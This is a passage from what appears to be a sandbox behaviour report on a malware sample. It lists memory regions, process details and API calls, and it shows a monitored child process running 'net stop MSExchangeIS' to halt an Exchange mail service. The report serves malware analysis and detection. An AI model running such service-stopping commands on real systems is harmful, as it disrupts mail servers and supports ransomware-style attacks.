[0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10435 start_va = 0x7fb97000 end_va = 0x7fb97fff entry_point = 0x0 region_type = private name = "private_0x000000007fb97000" filename = "" Region: id = 10436 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10437 start_va = 0x37334c0000 end_va = 0x37334dffff entry_point = 0x0 region_type = private name = "private_0x00000037334c0000" filename = "" Region: id = 10438 start_va = 0x37334e0000 end_va = 0x37334f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000037334e0000" filename = "" Region: id = 10439 start_va = 0x3733500000 end_va = 0x373353ffff entry_point = 0x0 region_type = private name = "private_0x0000003733500000" filename = "" Region: id = 10440 start_va = 0x7df5ffdc0000 end_va = 0x7ff5ffdbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffdc0000" filename = "" Region: id = 10441 start_va = 0x7ff6c3d50000 end_va = 0x7ff6c3d72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d50000" filename = "" Region: id = 10442 start_va = 0x7ff6c3d73000 end_va = 0x7ff6c3d73fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d73000" filename = "" Region: id = 10443 start_va = 0x7ff6c3d7e000 end_va = 0x7ff6c3d7ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d7e000" filename = "" Region: id = 10444 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 10445 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10446 start_va = 0x37334c0000 end_va = 0x37334cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000037334c0000" filename = "" Region: id = 10447 start_va = 0x37334d0000 end_va = 0x37334d6fff entry_point = 0x0 region_type = private name = "private_0x00000037334d0000" filename = "" Region: id = 10448 start_va = 0x3733540000 end_va = 0x37335fdfff entry_point = 0x3733540000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10449 start_va = 0x3733600000 end_va = 0x37336fffff entry_point = 0x0 region_type = private name = "private_0x0000003733600000" filename = "" Region: id = 10450 start_va = 0x3733700000 end_va = 0x373373ffff entry_point = 0x0 region_type = private name = "private_0x0000003733700000" filename = "" Region: id = 10451 start_va = 0x3733740000 end_va = 0x3733740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003733740000" filename = "" Region: id = 10452 start_va = 0x3733750000 end_va = 0x3733756fff entry_point = 0x0 region_type = private name = "private_0x0000003733750000" filename = "" Region: id = 10453 start_va = 0x3733760000 end_va = 0x3733760fff entry_point = 0x0 region_type = private name = "private_0x0000003733760000" filename = "" Region: id = 10454 start_va = 0x3733770000 end_va = 0x3733770fff entry_point = 0x0 region_type = private name = "private_0x0000003733770000" filename = "" Region: id = 10455 start_va = 0x3733850000 end_va = 0x373385ffff entry_point = 0x0 region_type = private name = "private_0x0000003733850000" filename = "" Region: id = 10456 start_va = 0x3733860000 end_va = 0x37339e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003733860000" filename = "" Region: id = 10457 start_va = 0x37339f0000 end_va = 0x3733b70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000037339f0000" filename = "" Region: id = 10458 start_va = 0x3733b80000 end_va = 0x3734f7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003733b80000" filename = "" Region: id = 10459 start_va = 0x7ff6c3c50000 end_va = 0x7ff6c3d4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3c50000" filename = "" Region: id = 10460 start_va = 0x7ff6c3d7c000 end_va = 0x7ff6c3d7dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d7c000" filename = "" Region: id = 10461 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 10462 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 10463 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10464 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10465 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10466 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10467 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10468 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10469 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10470 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10471 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10472 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10473 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10474 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 642 os_tid = 0xde4 Thread: id = 643 os_tid = 0xdf8 Thread: id = 644 os_tid = 0xf60 Process: id = "211" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1259b000" os_pid = "0x524" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "209" os_parent_pid = "0xe34" cmd_line = "net stop MSExchangeIS" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10488 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 10489 start_va = 0x630000 end_va = 0x462ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 10490 start_va = 0x4630000 end_va = 0x464ffff entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 10491 start_va = 0x4650000 end_va = 0x4651fff entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 10492 start_va = 0x4660000 end_va = 0x4673fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004660000" filename = "" Region: id = 10493 start_va = 0x4680000 end_va = 0x46bffff entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 10494 start_va = 0x46c0000 end_va = 0x473ffff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 10495 start_va = 0x4740000 end_va = 0x4743fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004740000" filename = "" Region: id = 10496 start_va = 0x4750000 end_va = 0x4750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004750000" filename = "" Region: id = 10497 start_va = 0x4760000 end_va = 0x4761fff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 10498 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10499 start_va = 0x7f160000 end_va = 0x7f182fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f160000" filename = "" Region: id = 10500 start_va = 0x7f188000 end_va = 0x7f188fff entry_point = 0x0 region_type = private name = "private_0x000000007f188000" filename = "" Region: id = 10501 start_va = 0x7f18c000 end_va = 0x7f18cfff entry_point = 0x0 region_type = private name = "private_0x000000007f18c000" filename = "" Region: id = 10502 start_va = 0x7f18d000 end_va = 0x7f18ffff entry_point = 0x0 region_type = private name = "private_0x000000007f18d000" filename = "" Region: id = 10503 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10504 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10505 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10506 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10507 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10508 start_va = 0x4910000 end_va = 0x491ffff entry_point = 0x0 region_type = private name = "private_0x0000000004910000" filename = "" Region: id = 10509 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10510 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10511 start_va = 0x4b10000 end_va = 0x4c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 10512 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 646 os_tid = 0xa78 Thread: id = 647 os_tid = 0xa60 Process: id = "212" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1167c000" os_pid = "0xf20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "211" os_parent_pid = "0x524" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeIS" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10513 start_va = 0x770000 end_va = 0x78ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 10514 start_va = 0x790000 end_va = 0x791fff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 10515 start_va = 0x7a0000 end_va = 0x7b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 10516 start_va = 0x7c0000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 10517 start_va = 0x800000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 10518 start_va = 0x880000 end_va = 0x883fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 10519 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 10520 start_va = 0x8a0000 end_va = 0x8a1fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 10521 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 10522 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 10523 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10524 start_va = 0x7eb00000 end_va = 0x7eb22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb00000" filename = "" Region: id = 10525 start_va = 0x7eb28000 end_va = 0x7eb28fff entry_point = 0x0 region_type = private name = "private_0x000000007eb28000" filename = "" Region: id = 10526 start_va = 0x7eb2c000 end_va = 0x7eb2efff entry_point = 0x0 region_type = private name = "private_0x000000007eb2c000" filename = "" Region: id = 10527 start_va = 0x7eb2f000 end_va = 0x7eb2ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb2f000" filename = "" Region: id = 10528 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10529 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10530 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10531 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10532 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10533 start_va = 0xa20000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 10534 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10535 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10536 start_va = 0xb30000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 10537 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10538 start_va = 0x770000 end_va = 0x77ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 10539 start_va = 0x780000 end_va = 0x783fff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 10540 start_va = 0x8b0000 end_va = 0x96dfff entry_point = 0x8b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10541 start_va = 0x970000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 10542 start_va = 0xa30000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 10543 start_va = 0xd00000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 10544 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 10545 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 10546 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 10547 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 10548 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 10549 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 10550 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 10551 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 10552 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10553 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10554 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10555 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10556 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10557 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10558 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10559 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10560 start_va = 0x7ea00000 end_va = 0x7eafffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea00000" filename = "" Region: id = 10561 start_va = 0x7eb29000 end_va = 0x7eb2bfff entry_point = 0x0 region_type = private name = "private_0x000000007eb29000" filename = "" Region: id = 10562 start_va = 0x790000 end_va = 0x793fff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 10563 start_va = 0x9b0000 end_va = 0x9b2fff entry_point = 0x9b0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 10564 start_va = 0x9c0000 end_va = 0x9f1fff entry_point = 0x9c0000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 648 os_tid = 0xa5c [0137.057] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0137.057] __set_app_type (_Type=0x1) [0137.057] __p__fmode () returned 0x77ac4d6c [0137.057] __p__commode () returned 0x77ac5b1c [0137.057] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0137.058] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0137.058] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0137.058] GetConsoleOutputCP () returned 0x1b5 [0137.058] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0137.058] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.060] sprintf_s (in: _DstBuf=0x87f790, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0137.060] setlocale (category=0, locale=".437") returned="English_United States.437" [0137.061] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0137.061] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0137.061] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeIS" [0137.061] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x87f538, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0137.061] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x87f52c | out: Buffer=0x87f52c*=0xb38088) returned 0x0 [0137.061] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x87f530 | out: Buffer=0x87f530*=0xb380a0) returned 0x0 [0137.061] __iob_func () returned 0x77ac1208 [0137.062] _fileno (_File=0x77ac1208) returned 0 [0137.062] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0137.062] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0137.062] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0137.062] _wcsicmp (_String1="config", _String2="stop") returned -16 [0137.062] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0137.062] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0137.062] _wcsicmp (_String1="file", _String2="stop") returned -13 [0137.062] _wcsicmp (_String1="files", _String2="stop") returned -13 [0137.062] _wcsicmp (_String1="group", _String2="stop") returned -12 [0137.062] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0137.062] _wcsicmp (_String1="help", _String2="stop") returned -11 [0137.062] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0137.062] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0137.062] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0137.062] _wcsicmp (_String1="session", _String2="stop") returned -15 [0137.062] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0137.062] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0137.062] _wcsicmp (_String1="share", _String2="stop") returned -12 [0137.062] _wcsicmp (_String1="start", _String2="stop") returned -14 [0137.062] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0137.062] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0137.062] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0137.062] _wcsicmp (_String1="accounts", _String2="MSExchangeIS") returned -12 [0137.062] _wcsicmp (_String1="computer", _String2="MSExchangeIS") returned -10 [0137.062] _wcsicmp (_String1="config", _String2="MSExchangeIS") returned -10 [0137.062] _wcsicmp (_String1="continue", _String2="MSExchangeIS") returned -10 [0137.062] _wcsicmp (_String1="cont", _String2="MSExchangeIS") returned -10 [0137.062] _wcsicmp (_String1="file", _String2="MSExchangeIS") returned -7 [0137.062] _wcsicmp (_String1="files", _String2="MSExchangeIS") returned -7 [0137.062] _wcsicmp (_String1="group", _String2="MSExchangeIS") returned -6 [0137.062] _wcsicmp (_String1="groups", _String2="MSExchangeIS") returned -6 [0137.062] _wcsicmp (_String1="help", _String2="MSExchangeIS") returned -5 [0137.062] _wcsicmp (_String1="helpmsg", _String2="MSExchangeIS") returned -5 [0137.062] _wcsicmp (_String1="localgroup", _String2="MSExchangeIS") returned -1 [0137.062] _wcsicmp (_String1="pause", _String2="MSExchangeIS") returned 3 [0137.062] _wcsicmp (_String1="session", _String2="MSExchangeIS") returned 6 [0137.062] _wcsicmp (_String1="sessions", _String2="MSExchangeIS") returned 6 [0137.062] _wcsicmp (_String1="sess", _String2="MSExchangeIS") returned 6 [0137.062] _wcsicmp (_String1="share", _String2="MSExchangeIS") returned 6 [0137.062] _wcsicmp (_String1="start", _String2="MSExchangeIS") returned 6 [0137.062] _wcsicmp (_String1="stats", _String2="MSExchangeIS") returned 6 [0137.062] _wcsicmp (_String1="statistics", _String2="MSExchangeIS") returned 6 [0137.062] _wcsicmp (_String1="stop", _String2="MSExchangeIS") returned 6 [0137.062] _wcsicmp (_String1="time", _String2="MSExchangeIS") returned 7 [0137.062] _wcsicmp (_String1="user", _String2="MSExchangeIS") returned 8 [0137.062] _wcsicmp (_String1="users", _String2="MSExchangeIS") returned 8 [0137.062] _wcsicmp (_String1="msg", _String2="MSExchangeIS") returned 2 [0137.062] _wcsicmp (_String1="messenger", _String2="MSExchangeIS") returned -14 [0137.062] _wcsicmp (_String1="receiver", _String2="MSExchangeIS") returned 5 [0137.063] _wcsicmp (_String1="rcv", _String2="MSExchangeIS") returned 5 [0137.063] _wcsicmp (_String1="netpopup", _String2="MSExchangeIS") returned 1 [0137.063] _wcsicmp (_String1="redirector", _String2="MSExchangeIS") returned 5 [0137.063] _wcsicmp (_String1="redir", _String2="MSExchangeIS") returned 5 [0137.063] _wcsicmp (_String1="rdr", 